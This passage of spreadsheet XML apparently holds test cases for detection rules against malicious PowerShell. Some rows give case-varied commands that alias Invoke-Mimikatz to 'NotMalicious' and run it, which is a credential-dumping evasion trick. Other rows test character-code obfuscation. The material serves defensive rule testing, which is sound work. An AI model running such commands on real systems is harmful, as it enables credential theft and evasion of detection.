      <c r="D2167" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2167" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2167" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2168" ht="15.75" customHeight="1" s="42">
      <c r="A2168" s="43" t="n"/>
      <c r="B2168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2168" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2168" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2168" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2168" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2169" ht="15.75" customHeight="1" s="42">
      <c r="A2169" s="43" t="n"/>
      <c r="B2169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2169" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2169" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2169" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2169" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2170" ht="15.75" customHeight="1" s="42">
      <c r="A2170" s="43" t="n"/>
      <c r="B2170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2170" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2170" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2170" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I217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70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2170" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2171" ht="15.75" customHeight="1" s="42">
      <c r="A2171" s="43" t="n"/>
      <c r="B2171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2171" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2171" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2171" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2171" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2172" ht="15.75" customHeight="1" s="42">
      <c r="A2172" s="43" t="n"/>
      <c r="B2172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2172" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2172" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2172" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2173" ht="15.75" customHeight="1" s="42">
      <c r="A2173" s="43" t="n"/>
      <c r="B2173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2173" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2173" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2173" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F2173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2173" s="43" t="n"/>
      <c r="J2173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2173" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2174" ht="15.75" customHeight="1" s="42">
      <c r="A2174" s="43" t="n"/>
      <c r="B2174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2174" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2174" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2174" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F2174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2174" s="43" t="n"/>
      <c r="J2174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2174" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2175" ht="15.75" customHeight="1" s="42">
      <c r="A2175" s="43" t="n"/>
      <c r="B2175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2175" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2175" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2175" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F2175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2175" s="43" t="n"/>
      <c r="J2175" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2175" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2176" ht="15.75" customHeight="1" s="42">
      <c r="A2176" s="43" t="n"/>
      <c r="B2176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2176" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2176" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2176" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F2176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2176" s="43" t="n"/>
      <c r="J2176" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2176" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2177" ht="15.75" customHeight="1" s="42">
      <c r="A2177" s="43" t="n"/>
      <c r="B2177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2177" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2177" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2177" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F2177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2177" s="43" t="n"/>
      <c r="J2177" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2177" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2178" ht="15.75" customHeight="1" s="42">
      <c r="A2178" s="43" t="n"/>
      <c r="B2178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2178" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2178" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2178" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F2178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2178" s="43" t="n"/>
      <c r="J2178" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2178" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2179" ht="15.75" customHeight="1" s="42">
      <c r="A2179" s="43" t="n"/>
      <c r="B2179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2179" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2179" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2179" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F2179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2179" s="43" t="n"/>
      <c r="J2179" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2179" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2180" ht="15.75" customHeight="1" s="42">
      <c r="A2180" s="43" t="n"/>
      <c r="B2180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2180" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2180" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2180" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F2180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2180" s="43" t="n"/>
      <c r="J2180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2180" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2181" ht="15.75" customHeight="1" s="42">
      <c r="A2181" s="43" t="n"/>
      <c r="B2181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2181" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2181" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2181" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F2181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2181" s="43" t="n"/>
      <c r="J2181" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2181" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2182" ht="15.75" customHeight="1" s="42">
      <c r="A2182" s="43" t="n"/>
      <c r="B2182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2182" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2182" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2182" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F2182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2182" s="43" t="n"/>
      <c r="J2182" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2182" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2183" ht="15.75" customHeight="1" s="42">
      <c r="A2183" s="43" t="n"/>
      <c r="B2183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2183" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2183" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2183" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F2183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2183" s="43" t="n"/>
      <c r="J2183" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2183" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2184" ht="15.75" customHeight="1" s="42">
      <c r="A2184" s="43" t="n"/>
      <c r="B2184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2184" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2184" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2184" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAND "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F2184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2184" s="44" t="n"/>
      <c r="J2184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2184" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2185" ht="15.75" customHeight="1" s="42">
      <c r="A2185" s="43" t="n"/>
      <c r="B2185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2185" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2185" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2185" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2185" s="43" t="n"/>
      <c r="J2185" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2185" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2186" ht="15.75" customHeight="1" s="42">
      <c r="A2186" s="43" t="n"/>
      <c r="B2186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2186" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2186" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2186" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMand "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2186" s="44" t="n"/>
      <c r="J2186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2186" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2187" ht="15.75" customHeight="1" s="42">
      <c r="A2187" s="43" t="n"/>
      <c r="B2187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2187" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2187" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2187" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2187" s="43" t="n"/>
      <c r="J2187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2187" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2188" ht="15.75" customHeight="1" s="42">
      <c r="A2188" s="43" t="n"/>
      <c r="B2188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2188" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2188" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2188" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2188" s="43" t="n"/>
      <c r="J2188" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2188" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2189" ht="15.75" customHeight="1" s="42">
      <c r="A2189" s="43" t="n"/>
      <c r="B2189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2189" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2189" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2189" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2189" s="44" t="n"/>
      <c r="J2189" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2189" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2190" ht="15.75" customHeight="1" s="42">
      <c r="A2190" s="43" t="n"/>
      <c r="B2190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2190" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2190" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2190" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F2190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2190" s="43" t="n"/>
      <c r="J2190" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2190" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2191" ht="15.75" customHeight="1" s="42">
      <c r="A2191" s="43" t="n"/>
      <c r="B2191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2191" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2191" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2191" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2191" s="44" t="n"/>
      <c r="J2191" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2191" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2192" ht="15.75" customHeight="1" s="42">
      <c r="A2192" s="43" t="n"/>
      <c r="B2192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2192" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2192" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2192" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2192" s="43" t="n"/>
      <c r="J2192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2192" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2193" ht="15.75" customHeight="1" s="42">
      <c r="A2193" s="43" t="n"/>
      <c r="B2193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2193" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2193" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2193" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2193" s="43" t="n"/>
      <c r="J2193" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2193" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2194" ht="15.75" customHeight="1" s="42">
      <c r="A2194" s="43" t="n"/>
      <c r="B2194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2194" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2194" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2194" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2194" s="43" t="n"/>
      <c r="J2194" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2194" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2195" ht="15.75" customHeight="1" s="42">
      <c r="A2195" s="43" t="n"/>
      <c r="B2195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2195" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2195" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2195" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2195" s="43" t="n"/>
      <c r="J2195" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2195" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2196" ht="15.75" customHeight="1" s="42">
      <c r="A2196" s="43" t="n"/>
      <c r="B2196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2196" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2196" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2196" s="44" t="inlineStr">
        <is>
